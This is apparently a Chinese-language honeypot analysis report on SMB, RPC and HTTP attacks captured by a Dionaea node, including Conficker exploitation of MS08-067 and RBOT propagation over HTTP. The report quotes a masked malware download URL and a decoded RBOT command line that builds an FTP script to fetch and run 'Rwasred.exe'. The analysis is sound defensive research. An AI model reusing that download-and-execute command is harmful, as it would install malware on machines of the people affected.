骨干网Dionaea蜜罐节点smb与RPC服务攻击数据分析

　　针对445端口的攻击，其中271次在bistreams/目录下记录有交互数据，可能是s m b 协议渗透攻击的连接，Dionaea判断出针对MS04-011漏洞、MS04-012 漏洞和MS05-039漏洞的攻击各两次，针对MS08-067漏洞的攻击49次。103次攻击无法识别具体针对的漏洞，其余113次协议不匹配。

表3 Dionaea蜜罐捕获的一次典型MS08-067漏洞渗透攻击

　　针对smb协议渗透攻击过程十分简单。6月13日，检测到4次由同一源IP发起的针对MS08-067漏洞的渗透攻击。每次攻击，攻击源分别发起对445和139端口的连接，因为139端口没有模拟服务，连接被拒绝，而对445的连接，分别调用SRVSVC服务的NetPathCompare操作和NetPathCanonicalize操作，Dionaea识别出攻击针对的是MS-08067漏洞。Dionaea通过模拟攻击数据流中shellcode，分析出恶意程序的下载地址"ht tp://202.X.X.X:4420/etxwzrnh"，并通过curl下载到binaries/目录。我们在配置中开启了virustotal恶意文件自动提交功能，Dionaea自动提交恶意文件，之后接收恶意文件扫描结果，结果显示恶意攻击是由大名鼎鼎的Conficker蠕虫发起的。

　　TCP 139端口即NetBIOS会话服务上通常承载着smb overNetBIOS服务，因此和TCP 445端口上的smb Direct Host服务的安全威胁类似，但Dionaea蜜罐目前并没有将smb承载在TCP 139端口上，因此尚无法验证该端口上捕获的网络连接威胁类型与TCP 445端口是否完全一致。

　　而在TCP 135 端口上，Dionaea蜜罐捕获了1553次网络连接，其中通过交互记录了所调用R P C 接口的连接有1353次，其中1350次均请求了IOXIDResolver 接口中的ServerAlive2操作，根据对该操作的分析应为主机查点而触发的。其他3次则请求了ISyst emAct ivato r 接口的RemoteCreateInstance，查询可获知应是利用MS04-012漏洞的渗透攻击。

　　骨干网Dionaea蜜罐节点HTTP服务攻击数据分析

　　骨干网Dionaea蜜罐节点上捕获了1779次网络连接，我们可以利用如下命令对记录的bistreams网络会话内容进行分类：?md5sum 2011-0*/httpd* |?cut -d" " -f 1 | sort | uniq -c | sort? -g

　　结果显示拥有349个不同的网络会话交互内容，其中最为常见的是“GET /”，即对直接访问蜜罐模拟Web服务的根路径，我们对这些HTTP网络会话中最为异常的，会话内容长度达到6K的5次连接进行了进一步细致分析，这些连接拥有如下会话内容特性：

　　GET / HTTP/1.0
　　Host: xxx.xxx.xxx.xxx
　　Authorization: Negotiate
　　YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQ.....
　　==

　　通过细致分析，可知是通过smb over HTTP方式进行传播的RBOT僵尸程序，在这种方式下，IIS服务器允许NTLMbase64编码方式的多种形式认证，而这种传播机制正是利用了其中存在的安全漏洞。而对那段base64编码的长字符串进行解码之后就可以看到其中包含的shell批处理命令，可以看出其目的是通过FTP协议下载并执行恶意代码：

　　cmd /k echo open 0.0.0.0 21 > o&echo user 1 1 >> o &echo get Rwasred.exe >> o &echo quit >> o &ftp -n -s:o &Rwasred.exe

　　由于Dionaea蜜罐是属于一种通用型网络服务蜜罐工具，而并没有特别针对各种应用服务协议给出细致的模拟和日志解析，因此目前对HTTP等攻击形式多样的服务端口所提供的数据分析能力仍显不足，我们计划一方面为Dionaea蜜罐扩展如HTTP等常见应用服务的模拟与日志分析工具脚本，另一方面也将集成部署专用的Web应用蜜罐，如Glastopf，来增强蜜罐对目前流行的Web应用攻击威胁的捕获与分析能力。